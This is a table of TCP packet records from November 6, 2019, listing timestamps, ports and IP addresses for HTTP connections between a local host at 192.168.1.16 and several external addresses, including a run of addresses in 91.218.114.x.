Nov 6, 2019 14:02:49.883829117 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883882999 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.883924961 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884032965 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884243011 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884300947 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884392023 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884416103 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884433031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884509087 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884593964 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884716988 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884772062 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884886026 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.884917974 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.884993076 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885034084 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885052919 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885092974 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885168076 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885191917 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885274887 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885461092 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885482073 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885557890 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885791063 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885826111 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885890961 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.885941982 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.885977983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886030912 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.886198044 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886281967 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.886357069 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886450052 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.886471987 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886559963 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.886658907 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886682034 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.886749983 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887041092 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887062073 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887144089 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887166023 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887310982 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887324095 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887458086 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887492895 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887542009 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887584925 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887717009 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887732983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.887842894 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.887981892 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888010025 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888130903 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.888190031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888226032 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888317108 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.888503075 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888534069 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888629913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.888675928 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888706923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888775110 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.888804913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.888936996 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.888953924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889054060 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.889117956 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889153004 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889233112 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.889300108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889333963 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889413118 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.889636993 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889682055 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.889771938 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.889957905 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890109062 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.890125036 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890187979 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890217066 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.890326023 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.890459061 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890480995 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890554905 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.890583038 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890710115 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.890830994 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.890937090 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.913949013 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.923307896 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923373938 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923405886 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923508883 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.923516035 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923542976 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923595905 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923691988 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.923713923 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923767090 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923830032 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.923866034 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.923978090 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.924052954 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924107075 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924130917 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924201965 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.924375057 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924413919 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924438953 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924489975 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.924519062 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924546957 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924612045 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.924648046 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924738884 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.924882889 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924909115 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.924969912 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925005913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925154924 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925196886 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925291061 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925329924 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925393105 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925431013 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925441980 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925471067 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925529957 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925574064 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925595999 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925618887 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925626993 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925858021 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.925920010 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925962925 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.925997972 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926013947 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926017046 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926037073 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926141977 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926225901 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926291943 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926325083 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926359892 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926374912 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926453114 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926455975 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926517010 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926579952 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926614046 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926696062 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926759005 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926801920 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.926873922 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.926985025 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927011013 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927036047 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927098989 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927099943 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.927234888 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.927401066 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927464962 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927484035 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927501917 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.927545071 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927572966 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927591085 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927632093 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927644968 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.927685976 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927742958 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.927779913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.927895069 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928047895 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928076029 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928127050 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928144932 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928153038 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928199053 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928287983 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928301096 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928342104 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928405046 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928427935 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928447008 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928535938 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928702116 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928776026 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928798914 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.928802967 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928821087 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.928940058 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929055929 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929100990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929153919 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929271936 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929313898 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929359913 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929361105 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929419041 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929438114 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929483891 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929589987 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929678917 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929791927 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929878950 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.929902077 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929920912 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929970026 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.929996967 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930000067 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930013895 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930124998 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930295944 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930325031 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930341959 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930380106 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930392981 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930421114 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930438042 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930461884 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930546045 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930708885 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930737972 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930754900 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.930788994 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930886984 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.930994987 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931057930 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931083918 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.931159973 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.931193113 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931240082 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931265116 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.931269884 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931324005 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931351900 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931375980 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931423903 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.931488991 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931613922 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.931730032 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931763887 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931790113 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.931912899 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.932049990 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932075024 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932132006 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932162046 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932197094 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.932207108 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932326078 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932360888 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.932482004 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932504892 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.932528019 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932559013 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932662010 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.932852983 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932903051 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932930946 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932977915 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.932981968 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.933022022 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.933060884 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.933084011 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.933104038 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:49.933140993 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:49.933263063 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:54.876503944 CET	80	49163	104.168.198.208	192.168.1.16
Nov 6, 2019 14:02:54.876660109 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:02:59.800375938 CET	49163	80	192.168.1.16	104.168.198.208
Nov 6, 2019 14:03:09.457559109 CET	49164	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:09.535847902 CET	80	49164	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:09.535975933 CET	49164	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:09.538314104 CET	49164	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:09.538537025 CET	49164	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:09.616702080 CET	80	49164	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:09.618421078 CET	80	49164	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:09.618722916 CET	49164	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:10.469299078 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:10.554006100 CET	80	49165	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:10.554186106 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:10.555304050 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:10.640196085 CET	80	49165	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:10.641900063 CET	80	49165	91.218.114.4	192.168.1.16
Nov 6, 2019 14:03:10.642064095 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:03:10.725614071 CET	49166	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:03:10.820702076 CET	80	49166	91.218.114.11	192.168.1.16
Nov 6, 2019 14:03:10.820789099 CET	49166	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:03:10.822678089 CET	49166	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:03:10.822848082 CET	49166	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:03:10.917757988 CET	80	49166	91.218.114.11	192.168.1.16
Nov 6, 2019 14:03:10.917922020 CET	80	49166	91.218.114.11	192.168.1.16
Nov 6, 2019 14:03:10.917980909 CET	80	49166	91.218.114.11	192.168.1.16
Nov 6, 2019 14:03:10.918117046 CET	49166	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:03:11.033339977 CET	49167	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:03:11.127254963 CET	80	49167	91.218.114.25	192.168.1.16
Nov 6, 2019 14:03:11.127374887 CET	49167	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:03:11.128880978 CET	49167	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:03:11.129102945 CET	49167	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:03:11.222734928 CET	80	49167	91.218.114.25	192.168.1.16
Nov 6, 2019 14:03:11.224123001 CET	80	49167	91.218.114.25	192.168.1.16
Nov 6, 2019 14:03:11.224725962 CET	80	49167	91.218.114.25	192.168.1.16
Nov 6, 2019 14:03:11.224853039 CET	49167	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:03:11.396672010 CET	49168	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:03:11.474255085 CET	80	49168	91.218.114.26	192.168.1.16
Nov 6, 2019 14:03:11.474385023 CET	49168	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:03:11.475739956 CET	49168	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:03:11.475917101 CET	49168	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:03:11.553236961 CET	80	49168	91.218.114.26	192.168.1.16
Nov 6, 2019 14:03:11.553497076 CET	80	49168	91.218.114.26	192.168.1.16
Nov 6, 2019 14:03:11.553525925 CET	80	49168	91.218.114.26	192.168.1.16
Nov 6, 2019 14:03:11.553678036 CET	49168	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:03:12.124197006 CET	49169	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:15.118640900 CET	49169	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:21.118397951 CET	49169	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:34.457974911 CET	49173	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:37.462096930 CET	49173	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:43.462244987 CET	49173	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:55.482882977 CET	49177	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:03:58.493892908 CET	49177	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:04:04.509304047 CET	49177	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:04:10.677855968 CET	80	49165	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:10.677987099 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:16.650749922 CET	49181	80	192.168.1.16	91.218.114.32
Nov 6, 2019 14:04:16.731165886 CET	80	49181	91.218.114.32	192.168.1.16
Nov 6, 2019 14:04:16.731405020 CET	49181	80	192.168.1.16	91.218.114.32
Nov 6, 2019 14:04:16.736845016 CET	49181	80	192.168.1.16	91.218.114.32
Nov 6, 2019 14:04:16.736975908 CET	49181	80	192.168.1.16	91.218.114.32
Nov 6, 2019 14:04:16.817049026 CET	80	49181	91.218.114.32	192.168.1.16
Nov 6, 2019 14:04:16.817104101 CET	80	49181	91.218.114.32	192.168.1.16
Nov 6, 2019 14:04:16.817156076 CET	80	49181	91.218.114.32	192.168.1.16
Nov 6, 2019 14:04:16.817646980 CET	49181	80	192.168.1.16	91.218.114.32
Nov 6, 2019 14:04:16.890003920 CET	49182	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:16.977727890 CET	80	49182	91.218.114.37	192.168.1.16
Nov 6, 2019 14:04:16.978173018 CET	49182	80	192.168.1.16	91.218.114.37
